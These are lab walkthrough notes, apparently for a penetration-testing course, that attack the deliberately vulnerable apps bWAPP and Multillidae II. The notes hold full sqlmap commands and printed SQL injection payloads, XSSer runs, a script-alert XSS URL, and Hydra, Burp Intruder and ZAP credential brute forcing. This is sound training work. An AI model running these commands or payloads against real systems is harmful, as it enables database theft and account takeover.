# 🔬Web App Attacks ## Passive Crawling - Burp Suite > 🔬 [Passive Crawling with Burp Suite](https://attackdefense.com/challengedetails?cid=1891) > > * Target IP: `192.230.181.3` > * Multillidae II ```bash ip -br -c a eth1@if203734 UP 192.230.181.2/24 nmap -sS -sV 192.230.181.3 ``` * Open the browser and navigate to * `http://192.230.181.3/` * Activate `FoxyProxy` Plugin * Start `BurpSuite` (set *User options/Display/Look* to *Darcula* and restart BurpSuite) * Intercept the home page request and **turn off the intercept** * Check the **`HTTP history`** tab * Browse the Multillidae web app and Burp will crawl the visited pages ![HTTP history](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-0673f2ca9d351a54cd025ad0662de82d83791f5e%2Fimage-20230504185103214.png?alt=media) ![Passive crawl](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-254a251ef959c7634ad249e3f2d0e8caaf07fb33%2Fimage-20230504185134010.png?alt=media) * Check the **`Target`** tab for a **Site map** * Add site to the **Scope** ![Target](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-6ee2b194ee9d384032f8918ae4bad7f8f16fda59%2Fimage-20230504185311580.png?alt=media) *** ## SQL Injection - [SQLMap](https://sqlmap.org/) > 🔬 [SQL Injection with SQLMap](https://attackdefense.com/challengedetails?cid=2129) > > * Target IP: `192.42.186.3` > * bWAPP ```bash ip -br -c a eth1@if178967 UP 192.42.186.2/24 nmap -sS -sV 192.42.186.3 ``` * Open the browser and navigate to `http://192.42.186.3/`, login with `bee`:`bug`, select `SQL Injection (GET/Search)` and click Hack button * Input a string and search * `http://192.42.186.3/sqli_1.php?title=hacking&action=search` * Activate `FoxyProxy` Plugin * Start `BurpSuite` in Interception mode * Refresh the page, intercept the request and copy the cookie * Cookie: `PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0` ![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-079230cb3a13f2851bc74c6f8bb67679b643ca08%2Fimage-20230504191136451.png?alt=media) * Run `sqlmap`, defining `title` as the test parameter ```bash sqlmap -u "http://192.42.186.3/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title ``` ![sqlmap](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-be3f5e08da27c2090d2306f5a734bf2d3b6753eb%2Fimage-20230504192432292.png?alt=media) ```bash --- Parameter: title (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: title=hacking' AND (SELECT 1819 FROM(SELECT COUNT(*),CONCAT(0x716a767171,(SELECT (ELT(1819=1819,1))),0x7171707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'bLrY'='bLrY&action=search Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: title=hacking' AND (SELECT 1664 FROM (SELECT(SLEEP(5)))MSwT) AND 'jFDG'='jFDG&action=search Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: title=hacking' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a767171,0x7379784e74504d4e76744b6e4c524b4e516a4f4f7878676a51734e6d4c744d547450424844474f76,0x7171707071),NULL,NULL-- -&action=search --- ``` * In BurpSuite, send the request to Repeater * Copy the first payload from SQLMap and paste it as part of the `title` parameter ```bash hacking' AND (SELECT 1819 FROM(SELECT COUNT(*),CONCAT(0x716a767171,(SELECT (ELT(1819=1819,1))),0x7171707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'bLrY'='bLrY&action=search ``` ![SQL syntax error](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-4dc3e777768a6533b3390b40b6653e5cd345a527%2Fimage-20230504192903226.png?alt=media) * Use `sqlmap` to get a list of tables for the `bWAPP` database ```bash # List databases sqlmap -u "http://192.42.186.3/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title --dbs ``` ![SQLMap Databases](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-6a712971dd33601349d51b82a924cd051a0e9c8e%2Fimage-20230504194044253.png?alt=media) ```bash sqlmap -u "http://192.42.186.3/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title -D bWAPP --tables ``` ![SQLMap Tables](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-9cbac04cb3f3b8311ba0edb4ab44cde614f9f8cf%2Fimage-20230504193116155.png?alt=media) * Use `sqlmap` to get a list of columns in the `users` table of the `bWAPP` database ```bash sqlmap -u "http://192.42.186.3/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title -D bWAPP -T users --columns ``` ![SQLMap Columns](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-16750df447625b153cac029ce8bf29d7165e834f%2Fimage-20230504193222954.png?alt=media) * Dump `password` and `email` for **admin** from the `users` table ```bash sqlmap -u "http://192.42.186.3/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title -D bWAPP -T users -C admin,password,email --dump ``` ![SQLMap Dump](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-bbc9f0c27fb61b383ebf51bf32467c2a9135c77b%2Fimage-20230504193430547.png?alt=media) * Turn off Intercept mode in BurpSuite, navigate to `http://192.42.186.3/sqli_6.php` and turn back on Intercept mode. * Search `example` string from the page and intercept it * **Copy to file** the request and name the filerequest\` ![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-5a371dce6aeecd1d42fa8f184b8fa6520708b269%2Fimage-20230504193737291.png?alt=media) * Use `sqlmap` with this request file ```bash sqlmap -r request -p title ``` ![SQLMap request](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-04f2ec9ca5cd3d3972c2bfba2cfd0a05d0ec6d88%2Fimage-20230504194119586.png?alt=media) ```bash --- Parameter: title (POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: title=example' AND (SELECT 9391 FROM(SELECT COUNT(*),CONCAT(0x716a7a7071,(SELECT (ELT(9391=9391,1))),0x7162717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Yvps'='Yvps&action=search Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: title=example' AND (SELECT 6244 FROM (SELECT(SLEEP(5)))dWNC) AND 'Hfwn'='Hfwn&action=search Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: title=example' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a7a7071,0x7463445853774f49666461525a4b446d4a624a706a414976706b56495977444675766767546d6347,0x7162717871),NULL-- -&action=search --- ``` * In BurpSuite, send the request to Repeater * Try the proposed payloads from SQLMap ![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-f754d69fd746d22ff438727bb51c529c77b4e92d%2Fimage-20230504194521760.png?alt=media) * Change the request to pass `version()` function to the database ![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-c293996377859fb2121ec75084cebd558d65eb55%2Fimage-20230504194649954.png?alt=media) *** ## XSS Attack - [XSSer](https://github.com/epsylon/xsser) > 🔬 [XSS Attack with XSSer](https://attackdefense.com/challengedetails?cid=1889) > > * Target IP: `192.131.167.3` > * Multillidae II ```bash ip -br -c a eth1@if178967 UP 192.131.167.2/24 nmap -sS -sV 192.131.167.3 ``` ```bash # If Firefox does not start, check the service and kill it ps -e | grep firefox kill ``` * Navigate to the [XSS Reflected](https://portswigger.net/web-security/cross-site-scripting/reflected) - DNS Lookup webpage: * `http://192.131.167.3/index.php?page=dns-lookup.php` * Enter any text and `Lookup DNS` * The value is **reflected back** on the web page ![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-77957d64045ff08525b734c80193e2bb30cc65bd%2Fimage-20230504231032938.png?alt=media) * Activate `FoxyProxy` Plugin * Start `BurpSuite` * Enter any text and `Lookup DNS` and intercept the request in `BurpSuite` * Copy the payload and input `XSS` in the target\_host ![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-78f4b6c06321a37f352e3ab1e185d089569aeeb1%2Fimage-20230504231302343.png?alt=media) * Use **`xsser`** to check the vulnerability ```bash xsser --url 'http://192.131.167.3/index.php?page=dns-lookup.php' -p 'target_host=XSS&dns-lookup-php-submit-button=Lookup+DNS' ``` ![xsser](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-ae56b7d9a76fee82f954f97068dc04e701592902%2Fimage-20230504234542520.png?alt=media) ```bash xsser --url 'http://192.131.167.3/index.php?page=dns-lookup.php' -p 'target_host=XSS&dns-lookup-php-submit-button=Lookup+DNS' --auto ``` ![xsser --auto](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-e882c45da1ca5312958464d66978ffe274d009e9%2Fimage-20230504234754209.png?alt=media) * Use a custom XSS payload ```bash xsser --url 'http://192.131.167.3/index.php?page=dns-lookup.php' -p 'target_host=XSS&dns-lookup-php-submit-button=Lookup+DNS' --Fp "" ``` ![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-6ea78d7fe665b2750da232c5145da2701392b7bc%2Fimage-20230504234951322.png?alt=media) * Copy the `Final Attack` payload and use it in the browser or BurpSuite to trigger the XSS attack * `http://192.131.167.3/index.php?page=dns-lookup.php&target_host=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&dns-lookup-php-submit-button=Lookup+DNS` ![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-cc0d319c12d99b43d170b27e858ae9fcac5f690d%2Fimage-20230505000744559.png?alt=media) ![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-60c1c330fcb8662ce54f80fd01882743e0be3ac2%2Fimage-20230505000524631.png?alt=media) * Perform an XSS Poll Question attack over `GET` request * `http://192.131.167.3/index.php?page=user-poll.php` * copy the `URL`, replace the `nmap` value with **`XSS`** and pass it to XSSer * `http://192.131.167.3/index.php?page=user-poll.php&csrf-token=&choice=nmap&initials=2&user-poll-php-submit-button=Submit+Vote` ```bash xsser --url "http://192.131.167.3/index.php?page=user-poll.php&csrf-token=&choice=XSS&initials=2&user-poll-php-submit-button=Submit+Vote" ``` ![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-1f91eb772a83f0b933842b08f8950c4e6ebc4197%2Fimage-20230505002804916.png?alt=media) ```bash xsser --url "http://192.131.167.3/index.php?page=user-poll.php&csrf-token=&choice=XSS&initials=2&user-poll-php-submit-button=Submit+Vote" --Fp "" ``` ![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-f26feb862b9f6a9bf2b1a7f9ff41c39b1ceafdc7%2Fimage-20230505002847054.png?alt=media) * Open the `Final Attack` link in the browser * `http://192.131.167.3/index.php?page=user-poll.php&csrf-token=&choice=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&initials=2&user-poll-php-submit-button=Submit+Vote` ![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-ccd1b7060f8863483b822a06f20146d30ce86733%2Fimage-20230505002955557.png?alt=media) *** ## Authenticated XSS Attack - XSSer > 🔬 [Authenticated XSS Attack with XSSer](https://attackdefense.com/challengedetails?cid=1892) > > * Target IP: `192.56.179.3` > * bWAPP ```bash ip -br -c a eth1@if178967 UP 192.56.179.2/24 nmap -sS -sV 192.56.179.3 ``` * Login with `bug`:`bee`, select the `HTML Injection - Reflected (GET)` bug and input any value. Copy the URL * `http://192.56.179.3/htmli_get.php?firstname=hi&lastname=hi&form=submit` * Activate `FoxyProxy` Plugin, start `BurpSuite`, refresh the webpage and copy the `Cookie` from the Proxy intercepted request * `PHPSESSID=lb3rg4q495t9sqph907sdhjgg1; security_level=0` * Run the **`xsser`** tool by * replacing the `firstname` value string with `XSS` * feeding the Cookie * stop BurpSuite interceptor ```bash xsser --url "http://192.56.179.3/htmli_get.php?firstname=XSS&lastname=hi&form=submit" --cookie="PHPSESSID=lb3rg4q495t9sqph907sdhjgg1; security_level=0" ``` ![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-37d247b12f75742ba436ce069d6e40ddd01916d6%2Fimage-20230505004208373.png?alt=media) ```bash xsser --url "http://192.56.179.3/htmli_get.php?firstname=XSS&lastname=hi&form=submit" --cookie="PHPSESSID=lb3rg4q495t9sqph907sdhjgg1; security_level=0" --Fp "" ``` ![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-c14a4351c33eb3c5fe1a9fa911c398894c11fdb8%2Fimage-20230505004510028.png?alt=media) *** ## Attacking HTTP Login Form - Hydra > 🔬 [Attacking HTTP Login Form with Hydra](https://attackdefense.com/challengedetails?cid=1895) > > * Target IP: `192.210.201.3` > * bWAPP ```bash ip -br -c a eth1@if178967 UP 192.210.201.2/24 nmap -sS -sV 192.210.201.3 ``` * Open the `http://192.210.201.3/login.php` page, view source code and check the parameters passed in the login form. ![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-bd1a11bb6196f2cee5f78920e0c5a4d6dc8c47b6%2Fimage-20230505005152468.png?alt=media) * Prepare a usernames and a passwords list ```bash echo -e "admin\nbee\nuser1\nuser2" > users cat /root/Desktop/wordlists/100-common-passwords.txt > pws echo "bug" >> pws ``` * Use **`hydra`** to retrieve the credentials ```bash hydra -L users -P pws 192.210.201.3 http-post-form "/login.php:login=^USER^&password=^PASS^&security_level=0&form=submit:Invalid credentials or user not activated!" ``` ![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-5cc9d30d8237fb31bec58b3b9f92aec180a82c4c%2Fimage-20230505005851326.png?alt=media) *** ## Attacking Basic Auth - BurpSuite > 🔬 [Attacking Basic Auth with Burp Suite](https://attackdefense.com/challengedetails?cid=1896) > > * Target IP: `192.190.241.3` > * bWAPP ```bash ip -br -c a eth1@if178967 UP 192.190.241.2/24 nmap -sS -sV 192.190.241.3 ``` * Open **Firefox**, activate `FoxyProxy` Plugin, start `BurpSuite`, open `http://192.190.241.3/basic` and intercepted the request. Forward the request, input some data and intercept the request. * `/basic` directory uses **Basic Auth** * send the request to Intruder ![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-1206d7ad1ec0edb337a058d8e9efe6f6b4576715%2Fimage-20230505010447981.png?alt=media) * Navigate to **Intruder - Positions** tab * Decode the `base64` string, it will become `test:test`, like the input data from the login form ![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-2bdad5b540cf18051b31c8e716a933b5d98f4aee%2Fimage-20230505010744726.png?alt=media) * Replace the credentials with a parameter to be substituted like `§credentials§` ![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-0e95bf8ee261b93a2533e16fcecaca056e4b4901%2Fimage-20230505011014577.png?alt=media) * In the **Payload Options**, Load the `/root/Desktop/wordlists/100-common-passwords.txt:` list * In the **Payload Processing** - `Add prefix` rule, and input `admin:` to append it to all the passwords * Add a `Encode - Base64-encode` rule too * Start the attack * Check the entry result with status code `301` * **Send to Decoder** the `Authorization: Basic` value * Check the BurpSuite Decoder tab ![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-d3c3cd1f6d3209f65cf8ae3ca3cc8ebb36528e81%2Fimage-20230505011839378.png?alt=media) * Decoded as base64 string is `admin:cookie1` ![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-9a0ca7a859d4f62d1599b091f4bed3e8f364e795%2Fimage-20230505011939648.png?alt=media) * Turn off BurpSuite interceptor, open the web page and insert the found credentials > 🚩 The flag is `d25db4ce54b60b49dfd7b32c52ed8d26` ![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-9d5c20100885756ba116936783ef6abe631031da%2Fimage-20230505012055926.png?alt=media) *** ## Attacking HTTP Login Form - ZAProxy > 🔬 [Attacking HTTP Login Form with ZAProxy](https://attackdefense.com/challengedetails?cid=1897) > > * Target IP: `192.145.79.3` > * bWAPP ```bash ip -br -c a eth1@if178967 UP 192.145.79.2/24 nmap -sS -sV 192.145.79.3 ``` * Open the **`owasp-zap`** tool, Manual Explore, input the URL and launch browser * `http://192.145.79.3` * Attempt login with bad credentials. The website will be added to the sitemap inside `ZAP` ![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-14d6f9ce54c96916434c8ce7f2ab730c5d307c37%2Fimage-20230505012543553.png?alt=media) * Right click on the `POST` request and select **Fuzz...** ![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-de5a1b2bb75365ab25113f3bae58ef7d1907df7b%2Fimage-20230505012625120.png?alt=media) * Select the input username, click the Add button, Add again and input the payloads for username. Confirm with OK ![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-d35006b40f8ab385aebcae4ee32e0dfe0a0092c5%2Fimage-20230505012857458.png?alt=media) * Select the input password and do the same thing with a list of possible password ![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-006c9547f35de6bbbeb5046008db0ae05aba7045%2Fimage-20230505013049378.png?alt=media) * **Start Fuzzer** to start the attack and check the results and the `302` response ![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-bcef096799691ac1e1302425c1ca1b7d10784554%2Fimage-20230505013134379.png?alt=media) ![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-7763aea0a3a3457c1b1a8c026d8ef005f066f654%2Fimage-20230505013232454.png?alt=media) ***